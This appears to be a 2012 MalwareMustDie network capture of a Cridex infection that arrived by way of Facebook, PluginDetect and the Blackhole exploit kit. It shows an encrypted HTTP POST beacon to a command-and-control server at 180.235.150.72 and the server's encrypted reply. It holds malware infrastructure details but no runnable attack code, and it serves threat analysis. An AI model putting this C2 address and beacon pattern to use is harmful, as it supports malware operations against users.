MalwareMustDie - Cridex Network analysis

1. ===========================================
2. MalwareMustDie - Cridex Network analysis
3. Facebook --> PluginDetect 0.7.9 --> BHEK2
4. @unixfreaxjp - Sun, 25 Nov 2012 15:20:20 GMT
5. ===========================================
6.  
7. // TestPC ---> 180.235.150.72 HTTP-POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
8.  
9. POST /N5nmLCAAA/LxcqKAA/GLkOVCAAAA/ HTTP/1.1
10. Accept: */*
11. User-Agent: Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)
12. Host: 180.235.150.72:8080
13. Content-Length: 347
14. Connection: Keep-Alive
15. Cache-Control: no-cache
16. .....T*K..N..t...H......I:...{....X{.C..l.?su.{.N....29..%.....<v..S..
17. z..-D/...y. 7.J0.!>...i..Z..K....}....k.9.i|....IGJ....H..e
18. ...',.H.%..$..Y6....t..J..j....NSpb3p...:..J.....B?..v.)....C.]c.J+.o.
19. ..~..I&]6pf.Z....:...K....'y}EC....J.I<2.5..O..KX,u-R..k..f.i2..#KZg."
20. ..2..G\..~5"|..B...e........A.O..N..ic4..0...I......C.....UG..m..g.vt+
21. /.nw,l.HTTP/1.1 200 OK
22.  
23. // Receiving a long response below:
24.  
25. Server: nginx/1.0.10
26. Date: Sun, 25 Nov 2012 13:39:39 GMT
27. Content-Type: text/html; charset=UTF-8
28. Transfer-Encoding: chunked
29. Connection: keep-alive
30. X-Powered-By: PHP/5.3.18-1~dotdeb.0
31. Vary: Accept-Encoding
32.  
33. f3b
34. /..PS..~:Pk1.$...|a8......$....S.yb....p......d.VR..+P....... .P*.&+.i
35. .d..>.....tM.c.B+..W..^.2.......X..qr.|I.zY`0N.{.O.WU...4,.9..^kK
36. 2U...`........p..N..v...:O\dy.:.W.b."...]..Y...0.l.......m%.).=..N=..
37. :
38. long one...
39. :
40. zL..!..B............7..PS3..x...}.Q.s.4Ntm5K;t~p..0.....2%../*...Cd.J.
41. ...!D..5Q8...'E>-..5.*A...B6.h..=X.z.Y......[..;-....vm.h.aN.RX.(V...!
42. ..@a....M.@.+.ji.....C..U.S.e_...^......g?.<..-..^.xe.....`........%..
43. Z.2..../.
44. 0
45.  
46. // #MalwareMustDie!